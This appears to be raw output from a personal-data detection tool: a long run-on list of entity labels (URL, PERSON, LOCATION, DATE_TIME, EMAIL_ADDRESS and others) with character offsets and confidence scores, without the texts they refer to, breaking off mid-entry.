LOCATION, start: 2792, end: 2801, score: 0.85, type: LOCATION, start: 3619, end: 3633, score: 0.85, type: PERSON, start: 8622, end: 8652, score: 0.85, type: PERSON, start: 8660, end: 8676, score: 0.85, type: DATE_TIME, start: 9940, end: 9944, score: 0.85, type: LOCATION, start: 11544, end: 11553, score: 0.85, type: URL, start: 10638, end: 10666, score: 0.6, type: URL, start: 1916, end: 1923, score: 0.5, type: URL, start: 2509, end: 2516, score: 0.5, type: URL, start: 2638, end: 2645, score: 0.5, type: URL, start: 3491, end: 3498, score: 0.5, type: URL, start: 3671, end: 3678, score: 0.5, type: URL, start: 3691, end: 3696, score: 0.5, type: URL, start: 6441, end: 6446, score: 0.5, type: URL, start: 6514, end: 6519, score: 0.5, type: URL, start: 6571, end: 6576, score: 0.5, type: URL, start: 6660, end: 6665, score: 0.5, type: URL, start: 7041, end: 7047, score: 0.5, type: URL, start: 7224, end: 7229, score: 0.5, type: URL, start: 7310, end: 7315, score: 0.5, type: URL, start: 7389, end: 7395, score: 0.5, type: URL, start: 7837, end: 7846, score: 0.5, type: URL, start: 7867, end: 7874, score: 0.5, type: URL, start: 7956, end: 7963, score: 0.5, type: URL, start: 8029, end: 8035, score: 0.5, type: URL, start: 8325, end: 8330, score: 0.5, type: URL, start: 8600, end: 8613, score: 0.5, type: URL, start: 8635, end: 8648, score: 0.5, type: URL, start: 8665, end: 8674, score: 0.5, type: URL, start: 8688, end: 8695, score: 0.5, type: URL, start: 8706, end: 8711, score: 0.5, type: URL, start: 9573, end: 9579, score: 0.5, type: URL, start: 9843, end: 9849, score: 0.5, type: URL, start: 9871, end: 9878, score: 0.5, type: URL, start: 9968, end: 9975, score: 0.5, type: URL, start: 9986, end: 9991, score: 0.5, type: URL, start: 10682, end: 10689, score: 0.5, type: URL, start: 10716, end: 10731, score: 0.5, type: URL, start: 10776, end: 10791, score: 0.5, type: URL, start: 10893, end: 10900, score: 0.5, type: URL, start: 10911, end: 10916, score: 0.5, type: URL, start: 11128, end: 11143, score: 0.5, type: URL, start: 11160, end: 11175, score: 0.5, type: URL, start: 11185, end: 11192, score: 0.5, type: URL, start: 11208, end: 11229, score: 0.5, type: URL, start: 11308, end: 11313, score: 0.5, type: URL, start: 11761, end: 11766, score: 0.5, type: EMAIL_ADDRESS, start: 5286, end: 5301, score: 1.0, type: URL, start: 5331, end: 5362, score: 0.95, type: DATE_TIME, start: 63, end: 72, score: 0.85, type: PERSON, start: 73, end: 97, score: 0.85, type: PERSON, start: 111, end: 126, score: 0.85, type: LOCATION, start: 858, end: 864, score: 0.85, type: LOCATION, start: 880, end: 883, score: 0.85, type: PERSON, start: 2125, end: 2129, score: 0.85, type: LOCATION, start: 2132, end: 2141, score: 0.85, type: PERSON, start: 2320, end: 2324, score: 0.85, type: LOCATION, start: 2327, end: 2336, score: 0.85, type: PERSON, start: 2394, end: 2406, score: 0.85, type: LOCATION, start: 2569, end: 2578, score: 0.85, type: PERSON, start: 4836, end: 4840, score: 0.85, type: PERSON, start: 5177, end: 5181, score: 0.85, type: PERSON, start: 5242, end: 5257, score: 0.85, type: URL, start: 915, end: 920, score: 0.5, type: URL, start: 953, end: 965, score: 0.5, type: URL, start: 986, end: 1006, score: 0.5, type: URL, start: 1061, end: 1071, score: 0.5, type: URL, start: 1102, end: 1112, score: 0.5, type: URL, start: 1158, end: 1168, score: 0.5, type: URL, start: 1185, end: 1195, score: 0.5, type: URL, start: 1222, end: 1232, score: 0.5, type: URL, start: 1271, end: 1281, score: 0.5, type: URL, start: 1323, end: 1333, score: 0.5, type: URL, start: 1360, end: 1370, score: 0.5, type: URL, start: 1416, end: 1426, score: 0.5, type: URL, start: 1471, end: 1481, score: 0.5, type: URL, start: 1522, end: 1532, score: 0.5, type: URL, start: 1576, end: 1586, score: 0.5, type: URL, start: 1701, end: 1711, score: 0.5, type: URL, start: 1727, end: 1734, score: 0.5, type: URL, start: 1819, end: 1829, score: 0.5, type: URL, start: 1849, end: 1856, score: 0.5, type: URL, start: 2691, end: 2698, score: 0.5, type: URL, start: 2822, end: 2827, score: 0.5, type: URL, start: 2880, end: 2885, score: 0.5, type: URL, start: 3034, end: 3039, score: 0.5, type: URL, start: 3185, end: 3195, score: 0.5, type: URL, start: 3198, end: 3205, score: 0.5, type: URL, start: 3245, end: 3255, score: 0.5, type: URL, start: 3258, end: 3265, score: 0.5, type: URL, start: 3304, end: 3314, score: 0.5, type: URL, start: 3317, end: 3324, score: 0.5, type: URL, start: 3415, end: 3420, score: 0.5, type: URL, start: 3644, end: 3651, score: 0.5, type: URL, start: 3714, end: 3719, score: 0.5, type: URL, start: 3778, end: 3783, score: 0.5, type: URL, start: 3947, end: 3957, score: 0.5, type: URL, start: 4009, end: 4016, score: 0.5, type: URL, start: 4019, end: 4029, score: 0.5, type: URL, start: 4065, end: 4075, score: 0.5, type: URL, start: 4129, end: 4136, score: 0.5, type: URL, start: 4139, end: 4149, score: 0.5, type: URL, start: 4188, end: 4198, score: 0.5, type: URL, start: 4238, end: 4245, score: 0.5, type: URL, start: 4248, end: 4258, score: 0.5, type: URL, start: 4299, end: 4309, score: 0.5, type: URL, start: 4362, end: 4369, score: 0.5, type: URL, start: 4372, end: 4382, score: 0.5, type: URL, start: 4440, end: 4450, score: 0.5, type: URL, start: 4506, end: 4513, score: 0.5, type: URL, start: 4516, end: 4526, score: 0.5, type: URL, start: 4583, end: 4593, score: 0.5, type: URL, start: 4639, end: 4646, score: 0.5, type: URL, start: 4649, end: 4659, score: 0.5, type: URL, start: 4725, end: 4733, score: 0.5, type: URL, start: 4741, end: 4749, score: 0.5, type: URL, start: 4904, end: 4914, score: 0.5, type: URL, start: 4959, end: 4969, score: 0.5, type: URL, start: 5011, end: 5021, score: 0.5, type: URL, start: 5292, end: 5301, score: 0.5, type: URL, start: 5563, end: 5576, score: 0.5, type: URL, start: 5614, end: 5626, score: 0.5, type: URL, start: 5664, end: 5685, score: 0.5, type: PERSON, start: 964, end: 974, score: 0.85, type: PERSON, start: 974, end: 982, score: 0.85, type: PERSON, start: 996, end: 1006, score: 0.85, type: PERSON, start: 1084, end: 1089, score: 0.85, type: PERSON, start: 1176, end: 1179, score: 0.85, type: PERSON, start: 1255, end: 1258, score: 0.85, type: PERSON, start: 1532, end: 1563, score: 0.85, type: PERSON, start: 1573, end: 1595, score: 0.85, type: LOCATION, start: 2507, end: 2515, score: 0.85, type: IP_ADDRESS, start: 422, end: 431, score: 0.6, type: URL, start: 869, end: 880, score: 0.5, type: URL, start: 906, end: 911, score: 0.5, type: URL, start: 917, end: 926, score: 0.5, type: URL, start: 1041, end: 1046, score: 0.5, type: URL, start: 1067, end: 1072, score: 0.5, type: URL, start: 1118, end: 1123, score: 0.5, type: URL, start: 1182, end: 1191, score: 0.5, type: URL, start: 1262, end: 1271, score: 0.5, type: URL, start: 1400, end: 1410, score: 0.5, type: URL, start: 1481, end: 1490, score: 0.5, type: URL, start: 1541, end: 1550, score: 0.5, type: URL, start: 1627, end: 1636, score: 0.5, type: URL, start: 1643, end: 1651, score: 0.5, type: URL, start: 1667, end: 1676, score: 0.5, type: URL, start: 1684, end: 1693, score: 0.5, type: URL, start: 1779, end: 1792, score: 0.5, type: URL, start: 1944, end: 1957, score: 0.5, type: URL, start: 2034, end: 2047, score: 0.5, type: URL, start: 2101, end: 2107, score: 0.5, type: URL, start: 2376, end: 2402, score: 0.5, type: URL, start: 2522, end: 2532, score: 0.5, type: URL, start: 2671, end: 2678, score: 0.5, type: URL, start: 2700, end: 2707, score: 0.5, type: URL, start: 2779, end: 2786, score: 0.5, type: URL, start: 2811, end: 2818, score: 0.5, type: URL, start: 2987, end: 2997, score: 0.5, type: URL, start: 3133, end: 3140, score: 0.5, type: URL, start: 3162, end: 3169, score: 0.5, type: URL, start: 3249, end: 3256, score: 0.5, type: URL, start: 3281, end: 3288, score: 0.5, type: URL, start: 3349, end: 3359, score: 0.5, type: URL, start: 3500, end: 3507, score: 0.5, type: URL, start: 3529, end: 3536, score: 0.5, type: URL, start: 3612, end: 3619, score: 0.5, type: URL, start: 3644, end: 3651, score: 0.5, type: URL, start: 3757, end: 3767, score: 0.5, type: URL, start: 3905, end: 3912, score: 0.5, type: URL, start: 3934, end: 3941, score: 0.5, type: URL, start: 4013, end: 4020, score: 0.5, type: URL, start: 4045, end: 4052, score: 0.5, type: PERSON, start: 79, end: 94, score: 0.85, type: URL, start: 1097, end: 1106, score: 0.85, type: DATE_TIME, start: 2858, end: 2867, score: 0.85, type: PERSON, start: 4046, end: 4090, score: 0.85, type: DATE_TIME, start: 4170, end: 4199, score: 0.85, type: DATE_TIME, start: 4270, end: 4272, score: 0.85, type: DATE_TIME, start: 4274, end: 4276, score: 0.85, type: DATE_TIME, start: 4278, end: 4280, score: 0.85, type: DATE_TIME, start: 4977, end: 4982, score: 0.85, type: DATE_TIME, start: 5113, end: 5123, score: 0.85, type: DATE_TIME, start: 5135, end: 5140, score: 0.85, type: DATE_TIME, start: 5198, end: 5203, score: 0.85, type: DATE_TIME, start: 5238, end: 5246, score: 0.85, type: PERSON, start: 5335, end: 5343, score: 0.85, type: DATE_TIME, start: 5475, end: 5488, score: 0.85, type: PERSON, start: 5773, end: 5817, score: 0.85, type: LOCATION, start: 5963, end: 5981, score: 0.85, type: PERSON, start: 6124, end: 6133, score: 0.85, type: LOCATION, start: 6330, end: 6348, score: 0.85, type: PERSON, start: 6450, end: 6473, score: 0.85, type: DATE_TIME, start: 6988, end: 6993, score: 0.85, type: PERSON, start: 9940, end: 9954, score: 0.85, type: PERSON, start: 10055, end: 10069, score: 0.85, type: PERSON, start: 10174, end: 10202, score: 0.85, type: PERSON, start: 10203, end: 10217, score: 0.85, type: PERSON, start: 10360, end: 10374, score: 0.85, type: PERSON, start: 10517, end: 10531, score: 0.85, type: PERSON, start: 10629, end: 10643, score: 0.85, type: PERSON, start: 10778, end: 10783, score: 0.85, type: PERSON, start: 12200, end: 12205, score: 0.85, type: PERSON, start: 17789, end: 17833, score: 0.85, type: URL, start: 9665, end: 9715, score: 0.6, type: URL, start: 79, end: 89, score: 0.5, type: URL, start: 160, end: 169, score: 0.5, type: URL, start: 193, end: 216, score: 0.5, type: URL, start: 238, end: 267, score: 0.5, type: URL, start: 288, end: 302, score: 0.5, type: URL, start: 332, end: 341, score: 0.5, type: URL, start: 391, end: 400, score: 0.5, type: URL, start: 519, end: 534, score: 0.5, type: URL, start: 1050, end: 1059, score: 0.5, type: URL, start: 1427, end: 1446, score: 0.5, type: URL, start: 1598, end: 1617, score: 0.5, type: URL, start: 1693, end: 1707, score: 0.5, type: URL, start: 1965, end: 1976, score: 0.5, type: URL, start: 2242, end: 2261, score: 0.5, type: URL, start: 2310, end: 2330, score: 0.5, type: URL, start: 2358, end: 2369, score: 0.5, type: URL, start: 2517, end: 2537, score: 0.5, type: URL, start: 2557, end: 2571, score: 0.5, type: URL, start: 2618, end: 2629, score: 0.5, type: URL, start: 2739, end: 2743, score: 0.5, type: URL, start: 3216, end: 3223, score: 0.5, type: URL, start: 3306, end: 3313, score: 0.5, type: URL, start: 3376, end: 3383, score: 0.5, type: URL, start: 3457, end: 3464, score: 0.5, type: URL, start: 3841, end: 3860, score: 0.5, type: URL, start: 3963, end: 3982, score: 0.5, type: URL, start: 4046, end: 4065, score: 0.5, type: URL, start: 4142, end: 4150, score: 0.5, type: URL, start: 4642, end: 4650, score: 0.5, type: URL, start: 5010, end: 5021, score: 0.5, type: URL, start: 5143, end: 5159, score: 0.5, type: URL, start: 5204, end: 5212, score: 0.5, type: URL, start: 5222, end: 5230, score: 0.5, type: URL, start: 5267, end: 5275, score: 0.5, type: URL, start: 5279, end: 5287, score: 0.5, type: URL, start: 5348, end: 5356, score: 0.5, type: URL, start: 5360, end: 5368, score: 0.5, type: URL, start: 5405, end: 5413, score: 0.5, type: URL, start: 5417, end: 5425, score: 0.5, type: URL, start: 5506, end: 5526, score: 0.5, type: URL, start: 5662, end: 5673, score: 0.5, type: URL, start: 5773, end: 5792, score: 0.5, type: URL, start: 5843, end: 5852, score: 0.5, type: URL, start: 5879, end: 5890, score: 0.5, type: URL, start: 5971, end: 5978, score: 0.5, type: URL, start: 6073, end: 6081, score: 0.5, type: URL, start: 6206, end: 6214, score: 0.5, type: URL, start: 6338, end: 6345, score: 0.5, type: URL, start: 6450, end: 6469, score: 0.5, type: URL, start: 6563, end: 6582, score: 0.5, type: URL, start: 6687, end: 6706, score: 0.5, type: URL, start: 6823, end: 6832, score: 0.5, type: URL, start: 6878, end: 6887, score: 0.5, type: URL, start: 6929, end: 6938, score: 0.5, type: URL, start: 7000, end: 7011, score: 0.5, type: URL, start: 7131, end: 7145, score: 0.5, type: URL, start: 7275, end: 7279, score: 0.5, type: URL, start: 7298, end: 7302, score: 0.5, type: URL, start: 7323, end: 7343, score: 0.5, type: URL, start: 7355, end: 7359, score: 0.5, type: URL, start: 7450, end: 7463, score: 0.5, type: URL, start: 7829, end: 7843, score: 0.5, type: URL, start: 7882, end: 7886, score: 0.5, type: URL, start: 7905, end: 7909, score: 0.5, type: URL, start: 7930, end: 7950, score: 0.5, type: URL, start: 7962, end: 7966, score: 0.5, type: URL, start: 8030, end: 8041, score: 0.5, type: URL, start: 8186, end: 8201, score: 0.5, type: URL, start: 8237, end: 8251, score: 0.5, type: URL, start: 8442, end: 8461, score: 0.5, type: URL, start: 8559, end: 8563, score: 0.5, type: URL, start: 8586, end: 8590, score: 0.5, type: URL, start: 8611, end: 8631, score: 0.5, type: URL, start: 8647, end: 8651, score: 0.5, type: URL, start: 8736, end: 8740, score: 0.5, type: URL, start: 8799, end: 8803, score: 0.5, type: URL, start: 8913, end: 8917, score: 0.5, type: URL, start: 9934, end: 9942, score: 0.5, type: URL, start: 10002, end: 10019, score: 0.5, type: URL, start: 10049, end: 10057, score: 0.5, type: URL, start: 10128, end: 10145, score: 0.5, type: URL, start: 10148, end: 10159, score: 0.5, type: URL, start: 10197, end: 10205, score: 0.5, type: URL, start: 10290, end: 10307, score: 0.5, type: URL, start: 10354, end: 10362, score: 0.5, type: URL, start: 10447, end: 10464, score: 0.5, type: URL, start: 10478, end: 10485, score: 0.5, type: URL, start: 10511, end: 10519, score: 0.5, type: URL, start: 10584, end: 10601, score: 0.5, type: URL, start: 10623, end: 10631, score: 0.5, type: URL, start: 10688, end: 10705, score: 0.5, type: URL, start: 11213, end: 11221, score: 0.5, type: URL, start: 11314, end: 11322, score: 0.5, type: URL, start: 11348, end: 11357, score: 0.5, type: URL, start: 11477, end: 11485, score: 0.5, type: URL, start: 11592, end: 11600, score: 0.5, type: URL, start: 11633, end: 11642, score: 0.5, type: URL, start: 11745, end: 11753, score: 0.5, type: URL, start: 11823, end: 11831, score: 0.5, type: URL, start: 12684, end: 12692, score: 0.5, type: URL, start: 12798, end: 12806, score: 0.5, type: URL, start: 12953, end: 12964, score: 0.5, type: URL, start: 13010, end: 13021, score: 0.5, type: URL, start: 13035, end: 13055, score: 0.5, type: URL, start: 13063, end: 13074, score: 0.5, type: URL, start: 13089, end: 13100, score: 0.5, type: URL, start: 13305, end: 13315, score: 0.5, type: URL, start: 13415, end: 13425, score: 0.5, type: URL, start: 13437, end: 13454, score: 0.5, type: URL, start: 13670, end: 13680, score: 0.5, type: URL, start: 13697, end: 13714, score: 0.5, type: URL, start: 13756, end: 13773, score: 0.5, type: URL, start: 13825, end: 13833, score: 0.5, type: URL, start: 13951, end: 13958, score: 0.5, type: URL, start: 14047, end: 14057, score: 0.5, type: URL, start: 14074, end: 14091, score: 0.5, type: URL, start: 14110, end: 14120, score: 0.5, type: URL, start: 14209, end: 14216, score: 0.5, type: URL, start: 14269, end: 14279, score: 0.5, type: URL, start: 14382, end: 14401, score: 0.5, type: URL, start: 14424, end: 14434, score: 0.5, type: URL, start: 14448, end: 14462, score: 0.5, type: URL, start: 14628, end: 14638, score: 0.5, type: URL, start: 14680, end: 14695, score: 0.5, type: URL, start: 14951, end: 14960, score: 0.5, type: URL, start: 15004, end: 15013, score: 0.5, type: URL, start: 15089, end: 15097, score: 0.5, type: URL, start: 15220, end: 15227, score: 0.5, type: URL, start: 15286, end: 15296, score: 0.5, type: URL, start: 15377, end: 15387, score: 0.5, type: URL, start: 15576, end: 15586, score: 0.5, type: URL, start: 15701, end: 15709, score: 0.5, type: URL, start: 15827, end: 15834, score: 0.5, type: URL, start: 15859, end: 15869, score: 0.5, type: URL, start: 15998, end: 16017, score: 0.5, type: URL, start: 16057, end: 16068, score: 0.5, type: URL, start: 16434, end: 16444, score: 0.5, type: URL, start: 16540, end: 16549, score: 0.5, type: URL, start: 16593, end: 16602, score: 0.5, type: URL, start: 16659, end: 16667, score: 0.5, type: URL, start: 16785, end: 16792, score: 0.5, type: URL, start: 16817, end: 16827, score: 0.5, type: URL, start: 16959, end: 16978, score: 0.5, type: URL, start: 17316, end: 17325, score: 0.5, type: URL, start: 17459, end: 17469, score: 0.5, type: URL, start: 17584, end: 17592, score: 0.5, type: URL, start: 17710, end: 17717, score: 0.5, type: URL, start: 17789, end: 17808, score: 0.5, type: URL, start: 18005, end: 18012, score: 0.5, type: URL, start: 18192, end: 18211, score: 0.5, type: URL, start: 18265, end: 18276, score: 0.5, type: EMAIL_ADDRESS, start: 170, end: 185, score: 1.0, type: DATE_TIME, start: 146, end: 156, score: 0.95, type: PERSON, start: 76, end: 88, score: 0.85, type: DATE_TIME, start: 117, end: 121, score: 0.85, type: PERSON, start: 485, end: 489, score: 0.85, type: URL, start: 123, end: 132, score: 0.5, type: URL, start: 176, end: 185, score: 0.5, type: URL, start: 245, end: 250, score: 0.5, type: URL, start: 261, end: 266, score: 0.5, type: URL, start: 641, end: 649, score: 0.5, type: URL, start: 675, end: 683, score: 0.5, type: URL, start: 1112, end: 1116, score: 0.5, type: URL, start: 1225, end: 1231, score: 0.5, type: URL, start: 1337, end: 1344, score: 0.5, type: URL, start: 1391, end: 1398, score: 0.5, type: URL, start: 1679, end: 1689, score: 0.5, type: URL, start: 1842, end: 1847, score: 0.5, type: URL, start: 2100, end: 2108, score: 0.5, type: URL, start: 2344, end: 2352, score: 0.5, type: URL, start: 2589, end: 2597, score: 0.5, type: URL, start: 2666, end: 2674, score: 0.5, type: URL, start: 2763, end: 2776, score: 0.5, type: EMAIL_ADDRESS, start: 80, end: 95, score: 1.0, type: DATE_TIME, start: 66, end: 70, score: 0.85, type: PERSON, start: 71, end: 79, score: 0.85, type: LOCATION, start: 121, end: 129, score: 0.85, type: PERSON, start: 1588, end: 1590, score: 0.85, type: PERSON, start: 2675, end: 2707, score: 0.85, type: DATE_TIME, start: 3203, end: 3221, score: 0.85, type: LOCATION, start: 4238, end: 4242, score: 0.85, type: NRP, start: 4362, end: 4373, score: 0.85, type: NRP, start: 4420, end: 4431, score: 0.85, type: PERSON, start: 4970, end: 4981, score: 0.85, type: PERSON, start: 5027, end: 5048, score: 0.85, type: DATE_TIME, start: 6115, end: 6122, score: 0.85, type: LOCATION, start: 7087, end: 7089, score: 0.85, type: LOCATION, start: 7947, end: 7968, score: 0.85, type: PERSON, start: 8137, end: 8145, score: 0.85, type: PERSON, start: 10101, end: 10124, score: 0.85, type: PERSON, start: 10603, end: 10614, score: 0.85, type: PERSON, start: 10914, end: 10926, score: 0.85, type: PERSON, start: 11037, end: 11048, score: 0.85, type: PERSON, start: 11438, end: 11450, score: 0.85, type: NRP, start: 11626, end: 11633, score: 0.85, type: PERSON, start: 11693, end: 11728, score: 0.85, type: PERSON, start: 11974, end: 11997, score: 0.85, type: LOCATION, start: 12084, end: 12124, score: 0.85, type: PERSON, start: 12636, end: 12649, score: 0.85, type: LOCATION, start: 13259, end: 13263, score: 0.85, type: LOCATION, start: 14065, end: 14089, score: 0.85, type: PERSON, start: 15522, end: 15548, score: 0.85, type: URL, start: 724, end: 752, score: 0.6, type: URL, start: 11764, end: 11810, score: 0.6, type: URL, start: 11811, end: 11833, score: 0.6, type: URL, start: 86, end: 95, score: 0.5, type: URL, start: 910, end: 916, score: 0.5, type: URL, start: 1005, end: 1015, score: 0.5, type: URL, start: 1041, end: 1051, score: 0.5, type: URL, start: 1079, end: 1089, score: 0.5, type: URL, start: 1113, end: 1123, score: 0.5, type: URL, start: 1155, end: 1165, score: 0.5, type: URL, start: 1202, end: 1213, score: 0.5, type: URL, start: 1278, end: 1288, score: 0.5, type: URL, start: 1346, end: 1357, score: 0.5, type: URL, start: 1396, end: 1407, score: 0.5, type: URL, start: 1475, end: 1489, score: 0.5, type: URL, start: 1570, end: 1580, score: 0.5, type: URL, start: 1933, end: 1942, score: 0.5, type: URL, start: 2504, end: 2511, score: 0.5, type: URL, start: 2624, end: 2631, score: 0.5, type: URL, start: 2675, end: 2682, score: 0.5, type: URL, start: 2713, end: 2720, score: 0.5, type: URL, start: 2773, end: 2780, score: 0.5, type: URL, start: 2823, end: 2830, score: 0.5, type: URL, start: 2873, end: 2887, score: 0.5, type: URL, start: 2910, end: 2928, score: 0.5, type: URL, start: 2937, end: 2946, score: 0.5, type: URL, start: 3020, end: 3027, score: 0.5, type: URL, start: 3047, end: 3054, score: 0.5, type: URL, start: 3060, end: 3069, score: 0.5, type: URL, start: 3076, end: 3090, score: 0.5, type: URL, start: 3099, end: 3113, score: 0.5, type: URL, start: 3257, end: 3264, score: 0.5, type: URL, start: 3317, end: 3331, score: 0.5, type: URL, start: 3359, end: 3380, score: 0.5, type: URL, start: 3574, end: 3581, score: 0.5, type: URL, start: 3609, end: 3616, score: 0.5, type: URL, start: 3686, end: 3693, score: 0.5, type: URL, start: 3779, end: 3788, score: 0.5, type: URL, start: 3927, end: 3936, score: 0.5, type: URL, start: 3957, end: 3964, score: 0.5, type: URL, start: 4094, end: 4101, score: 0.5, type: URL, start: 4146, end: 4153, score: 0.5, type: URL, start: 4213, end: 4220, score: 0.5, type: URL, start: 4398, end: 4405, score: 0.5, type: URL, start: 4496, end: 4506, score: 0.5, type: URL, start: 4545, end: 4552, score: 0.5, type: URL, start: 4644, end: 4653, score: 0.5, type: URL, start: 4703, end: 4712, score: 0.5, type: URL, start: 4722, end: 4732, score: 0.5, type: URL, start: 4753, end: 4762, score: 0.5, type: URL, start: 4770, end: 4779, score: 0.5, type: URL, start: 4822, end: 4831, score: 0.5, type: URL, start: 4849, end: 4858, score: 0.5, type: URL, start: 4865, end: 4872, score: 0.5, type: URL, start: 4895, end: 4902, score: 0.5, type: URL, start: 4938, end: 4948, score: 0.5, type: URL, start: 4970, end: 4979, score: 0.5, type: URL, start: 5005, end: 5014, score: 0.5, type: URL, start: 5027, end: 5037, score: 0.5, type: URL, start: 5099, end: 5108, score: 0.5, type: URL, start: 5136, end: 5146, score: 0.5, type: URL, start: 5265, end: 5274, score: 0.5, type: URL, start: 5305, end: 5315, score: 0.5, type: URL, start: 5404, end: 5414, score: 0.5, type: URL, start: 5507, end: 5514, score: 0.5, type: URL, start: 5535, end: 5542, score: 0.5, type: URL, start: 5565, end: 5572, score: 0.5, type: URL, start: 5656, end: 5666, score: 0.5, type: URL, start: 5943, end: 5950, score: 0.5, type: URL, start: 5985, end: 5992, score: 0.5, type: URL, start: 6003, end: 6010, score: 0.5, type: URL, start: 6057, end: 6078, score: 0.5, type: URL, start: 6152, end: 6166, score: 0.5, type: URL, start: 6169, end: 6176, score: 0.5, type: URL, start: 6365, end: 6379, score: 0.5, type: URL, start: 6441, end: 6448, score: 0.5, type: URL, start: 6456, end: 6460, score: 0.5, type: URL, start: 6512, end: 6519, score: 0.5, type: URL, start: 6531, end: 6541, score: 0.5, type: URL, start: 6652, end: 6659, score: 0.5, type: URL, start: 6900, end: 6907, score: 0.5, type: URL, start: 6991, end: 7005, score: 0.5, type: URL, start: 7093, end: 7107, score: 0.5, type: URL, start: 7124, end: 7129, score: 0.5, type: URL, start: 7152, end: 7166, score: 0.5, type: URL, start: 7171, end: 7180, score: 0.5, type: URL, start: 7206, end: 7216, score: 0.5, type: URL, start: 7350, end: 7357, score: 0.5, type: URL, start: 7403, end: 7410, score: 0.5, type: URL, start: 7490, end: 7497, score: 0.5, type: URL, start: 7602, end: 7612, score: 0.5, type: URL, start: 7631, end: 7640, score: 0.5, type: URL, start: 7661, end: 7670, score: 0.5, type: URL, start: 7688, end: 7697, score: 0.5, type: URL, start: 7771, end: 7778, score: 0.5, type: URL, start: 7804, end: 7819, score: 0.5, type: URL, start: 7900, end: 7907, score: 0.5, type: URL, start: 7951, end: 7958, score: 0.5, type: URL, start: 7987, end: 7996, score: 0.5, type: URL, start: 8118, end: 8127, score: 0.5, type: URL, start: 8150, end: 8159, score: 0.5, type: URL, start: 8173, end: 8180, score: 0.5, type: URL, start: 8279, end: 8288, score: 0.5, type: URL, start: 8370, end: 8379, score: 0.5, type: URL, start: 8405, end: 8412, score: 0.5, type: URL, start: 8437, end: 8444, score: 0.5, type: URL, start: 8522, end: 8531, score: 0.5, type: URL, start: 8626, end: 8633, score: 0.5, type: URL, start: 8663, end: 8672, score: 0.5, type: URL, start: 8711, end: 8720, score: 0.5, type: URL, start: 8800, end: 8809, score: 0.5, type: URL, start: 8812, end: 8818, score: 0.5, type: URL, start: 8889, end: 8898, score: 0.5, type: URL, start: 9052, end: 9062, score: 0.5, type: URL, start: 9082, end: 9091, score: 0.5, type: URL, start: 9245, end: 9255, score: 0.5, type: URL, start: 9276, end: 9285, score: 0.5, type: URL, start: 9306, end: 9315, score: 0.5, type: URL, start: 9326, end: 9333, score: 0.5, type: URL, start: 9356, end: 9363, score: 0.5, type: URL, start: 9427, end: 9436, score: 0.5, type: URL, start: 9455, end: 9464, score: 0.5, type: URL, start: 9503, end: 9512, score: 0.5, type: URL, start: 9565, end: 9574, score: 0.5, type: URL, start: 9577, end: 9583, score: 0.5, type: URL, start: 9652, end: 9661, score: 0.5, type: URL, start: 9819, end: 9829, score: 0.5, type: URL, start: 9851, end: 9860, score: 0.5, type: URL, start: 10004, end: 10013, score: 0.5, type: URL, start: 10081, end: 10090, score: 0.5, type: URL, start: 10116, end: 10122, score: 0.5, type: URL, start: 10180, end: 10187, score: 0.5, type: URL, start: 10241, end: 10248, score: 0.5, type: URL, start: 10281, end: 10288, score: 0.5, type: URL, start: 10310, end: 10317, score: 0.5, type: URL, start: 10378, end: 10385, score: 0.5, type: URL, start: 10400, end: 10407, score: 0.5, type: URL, start: 10413, end: 10420, score: 0.5, type: URL, start: 10443, end: 10450, score: 0.5, type: URL, start: 10454, end: 10461, score: 0.5, type: URL, start: 10467, end: 10474, score: 0.5, type: URL, start: 10539, end: 10546, score: 0.5, type: URL, start: 10570, end: 10580, score: 0.5, type: URL, start: 10603, end: 10612, score: 0.5, type: URL, start: 10647, end: 10654, score: 0.5, type: URL, start: 10663, end: 10669, score: 0.5, type: URL, start: 10681, end: 10688, score: 0.5, type: URL, start: 10729, end: 10735, score: 0.5, type: URL, start: 10774, end: 10781, score: 0.5, type: URL, start: 10829, end: 10835, score: 0.5, type: URL, start: 10875, end: 10882, score: 0.5, type: URL, start: 10914, end: 10920, score: 0.5, type: URL, start: 10934, end: 10941, score: 0.5, type: URL, start: 10967, end: 10974, score: 0.5, type: URL, start: 11009, end: 11019, score: 0.5, type: URL, start: 11037, end: 11046, score: 0.5, type: URL, start: 11070, end: 11077, score: 0.5, type: URL, start: 11094, end: 11100, score: 0.5, type: URL, start: 11126, end: 11135, score: 0.5, type: URL, start: 11155, end: 11164, score: 0.5, type: URL, start: 11188, end: 11197, score: 0.5, type: URL, start: 11219, end: 11226, score: 0.5, type: URL, start: 11278, end: 11285, score: 0.5, type: URL, start: 11438, end: 11444, score: 0.5, type: URL, start: 11464, end: 11479, score: 0.5, type: URL, start: 11505, end: 11520, score: 0.5, type: URL, start: 11641, end: 11648, score: 0.5, type: URL, start: 11954, end: 11963, score: 0.5, type: URL, start: 11989, end: 11995, score: 0.5, type: URL, start: 12020, end: 12027, score: 0.5, type: URL, start: 12088, end: 12095, score: 0.5, type: URL, start: 12112, end: 12118, score: 0.5, type: URL, start: 12171, end: 12178, score: 0.5, type: URL, start: 12204, end: 12214, score: 0.5, type: URL, start: 12274, end: 12281, score: 0.5, type: URL, start: 12306, end: 12313, score: 0.5, type: URL, start: 12352, end: 12359, score: 0.5, type: URL, start: 12392, end: 12402, score: 0.5, type: URL, start: 12536, end: 12546, score: 0.5, type: URL, start: 12673, end: 12679, score: 0.5, type: URL, start: 12706, end: 12713, score: 0.5, type: URL, start: 12943, end: 12949, score: 0.5, type: URL, start: 13033, end: 13037, score: 0.5, type: URL, start: 13074, end: 13081, score: 0.5, type: URL, start: 13086, end: 13098, score: 0.5, type: URL, start: 13145, end: 13152, score: 0.5, type: URL, start: 13210, end: 13217, score: 0.5, type: URL, start: 13379, end: 13389, score: 0.5, type: URL, start: 13538, end: 13543, score: 0.5, type: URL, start: 13664, end: 13669, score: 0.5, type: URL, start: 13713, end: 13718, score: 0.5, type: URL, start: 13784, end: 13789, score: 0.5, type: URL, start: 13946, end: 13956, score: 0.5, type: URL, start: 13989, end: 13993, score: 0.5, type: URL, start: 14011, end: 14018, score: 0.5, type: URL, start: 14023, end: 14035, score: 0.5, type: URL, start: 14121, end: 14128, score: 0.5, type: URL, start: 14183, end: 14192, score: 0.5, type: URL, start: 14220, end: 14230, score: 0.5, type: URL, start: 14277, end: 14287, score: 0.5, type: URL, start: 14420, end: 14427, score: 0.5, type: URL, start: 14530, end: 14535, score: 0.5, type: URL, start: 14617, end: 14628, score: 0.5, type: URL, start: 14645, end: 14652, score: 0.5, type: URL, start: 14765, end: 14771, score: 0.5, type: URL, start: 14852, end: 14856, score: 0.5, type: URL, start: 14920, end: 14929, score: 0.5, type: URL, start: 14970, end: 14975, score: 0.5, type: URL, start: 15024, end: 15034, score: 0.5, type: URL, start: 